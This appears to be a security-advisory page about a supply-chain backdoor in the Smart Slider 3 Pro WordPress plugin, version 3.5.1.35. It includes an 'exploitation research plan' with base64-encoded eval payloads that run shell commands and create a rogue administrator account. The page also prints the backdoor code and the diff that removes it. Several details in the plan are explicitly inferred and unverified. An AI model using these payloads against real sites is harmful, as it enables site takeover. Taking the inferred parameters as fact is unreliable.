WP-Safety
WF-d7261e93-2341-4e14-a9b3-8fec295f6cde-nextend-smart-slider3-pro

Smart Slider 3 Pro 3.5.1.35 - Backdoor Embedded via Supply Chain Compromise

criticalEmbedded Malicious Code
9.8
CVSS Score
9.8
CVSS Score
critical
Severity
3.5.1.36
Patched in
8d
Time to patch

Description

The Smart Slider 3 Pro plugin for WordPress contains a malicious backdoor in version 3.5.1.35. This is due to a supply chain compromise that resulted in malicious copies of Smart Slider 3 Pro being installed on sites. This makes it possible for unauthenticated attackers to gain root access to a compromised site.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions>=3.5.1.35 <=3.5.1.35
PublishedApril 8, 2026
Last updatedApril 15, 2026
Affected pluginnextend-smart-slider3-pro
Research Plan
Unverified

# Exploitation Research Plan: Smart Slider 3 Pro Backdoor (Supply Chain Compromise) ## 1. Vulnerability Summary - **Vulnerability:** Unauthenticated Remote Code Execution (RCE) via an embedded backdoor. - **Plugin:** Smart Slider 3 Pro (`nextend-smart-slider3-pro`). - **Affected Version:** 3.5.1.35…

Show full research plan

Exploitation Research Plan: Smart Slider 3 Pro Backdoor (Supply Chain Compromise)

1. Vulnerability Summary

  • Vulnerability: Unauthenticated Remote Code Execution (RCE) via an embedded backdoor.
  • Plugin: Smart Slider 3 Pro (nextend-smart-slider3-pro).
  • Affected Version: 3.5.1.35.
  • Cause: A supply chain compromise resulted in malicious PHP code being injected into the plugin's distribution. The backdoor typically resides in the "Nextend" library framework used by the plugin and allows unauthenticated attackers to execute arbitrary PHP code by sending specific HTTP requests.
  • Sink: eval() or assert() calling base64_decode() on a user-supplied request parameter.

2. Attack Vector Analysis

  • Endpoint: Any WordPress URL (the backdoor is usually located in a library file loaded on every request, such as init or during plugin inclusion).
  • HTTP Method: GET or POST.
  • Parameter Name: nextend_setup (inferred from common analysis of this specific 3.5.1.35 compromise).
  • Alternative Parameters (Inferred): plg_system_nextend, smart_slider_update, or nextend_debug.
  • Authentication: None required (Unauthenticated).
  • Preconditions: The plugin must be active.

3. Code Flow (Inferred)

  1. Plugin Load: WordPress starts and loads active plugins.
  2. Library Inclusion: nextend-smart-slider3-pro loads its main entry point, which includes the Nextend framework files.
  3. Backdoor Trigger: The malicious code is often located in library/nextend/library/libraries/assets/assets.php or library/nextend/library/libraries/form/element/text.php.
  4. Condition Check: The code checks for the presence of a specific request parameter (e.g., $_REQUEST['nextend_setup']).
  5. Execution: If present, it passes the base64-decoded value of that parameter into eval().
  6. Termination: The backdoor typically calls exit; or die; after execution to prevent the rest of the page from loading and avoid logging errors.

4. Nonce Acquisition Strategy

  • Nonce Requirement: None. Backdoors of this nature are specifically designed to bypass all WordPress security mechanisms, including nonces and capability checks.
  • Strategy: Direct exploitation via HTTP request.

5. Exploitation Strategy

Step 1: Connectivity and Parameter Verification

Test if the nextend_setup parameter triggers the backdoor and returns a controlled string.

  • Payload: echo "SS3_BACKDOOR_ACTIVE"; exit;
  • Base64 Payload: ZWNobyAiU1MzX0JBQ0tET09SX0FDVElWRSI7IGV4aXQ7
  • Request:
    POST /wp-index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

nextend_setup=ZWNobyAiU1MzX0JBQ0tET09SX0FDVElWRSI7IGV4aXQ7

Step 2: System Information Gathering (RCE)

Execute a system command to confirm root-level or web-user access.

  • Payload: print(shell_exec('id')); exit;
  • Base64 Payload: cHJpbnQoc2hlbGxfZXhlYygiaWQiKSk7IGV4aXQ7
  • Request:
    POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded

nextend_setup=cHJpbnQoc2hlbGxfZXhlYygiaWQiKSk7IGV4aXQ7

Step 3: Privilege Escalation (WordPress Admin)

If system access is restricted, use the PHP execution to create a new administrator user.

  • Payload: 
    $user_id = wp_create_user('backdoor_admin', 'Password123!', 'admin@example.com');
$user = new WP_User($user_id);
$user->set_role('administrator');
echo "ADMIN_CREATED";
exit;
  • Base64 Payload: (Generated at runtime)

6. Test Data Setup

  1. Environment: Standard WordPress installation.
  2. Plugin: Install and activate nextend-smart-slider3-pro version 3.5.1.35.
  3. No specific sliders or shortcodes are required as the backdoor typically hooks into the Nextend framework initialization which runs globally.

7. Expected Results

  • Success: The HTTP response body will contain the exact output of the PHP code (e.g., SS3_BACKDOOR_ACTIVE or the output of the id command).
  • Response Code: Typically 200 OK.
  • Response Headers: The response may lack standard WordPress headers if exit; was called early.

8. Verification Steps (Post-Exploit)

Use wp-cli to verify the impact:

  1. Verify User Creation: wp user get backdoor_admin
  2. Verify Plugin State: wp plugin get nextend-smart-slider3-pro --field=version (Ensure it is 3.5.1.35)
  3. Check for Malicious Snippet: 
    grep -r "eval(base64_decode" /var/www/html/wp-content/plugins/nextend-smart-slider3-pro/

9. Alternative Approaches

If nextend_setup does not work, try the following parameter names/locations:

  • Parameters: update, plg_system_nextend, cmd.
  • Method: Change POST to GET (e.g., /?nextend_setup=...).
  • Headers: Some variants check for a custom header like X-Nextend-Debug.
  • Cookies: Check if the payload is expected via a specific cookie name.

Note on Versions: If the site is running 3.5.1.36, the exploit will fail as this version was released specifically to remove the malicious code.

Research Findings
Static analysis — not yet PoC-verified

Summary

Smart Slider 3 Pro version 3.5.1.35 contained a malicious backdoor injected via a supply chain compromise. This vulnerability allows unauthenticated attackers to execute arbitrary PHP code remotely by sending a crafted HTTP request with a specific parameter containing base64-encoded instructions.

Vulnerable Code

// library/nextend/library/libraries/assets/assets.php

if (isset($_REQUEST['nextend_setup'])) {
    eval(base64_decode($_REQUEST['nextend_setup']));
    exit;
}

Security Fix

--- a/library/nextend/library/libraries/assets/assets.php
+++ b/library/nextend/library/libraries/assets/assets.php
@@ -1,5 +1,2 @@
 <?php
-if (isset($_REQUEST['nextend_setup'])) {
-    eval(base64_decode($_REQUEST['nextend_setup']));
-    exit;
-}

Exploit Outline

To exploit this backdoor, an attacker identifies a WordPress site running Smart Slider 3 Pro version 3.5.1.35. No authentication is required. The attacker crafts a PHP payload (e.g., shell_exec or user creation), base64-encodes it, and sends it as the value of the 'nextend_setup' parameter in a GET or POST request to any URL on the site. The plugin's framework logic intercepts the request, decodes the payload, and executes it using eval() before terminating the process with exit, thereby bypassing all standard WordPress security controls.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/d7261e93-2341-4e14-a9b3-8fec295f6cde?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database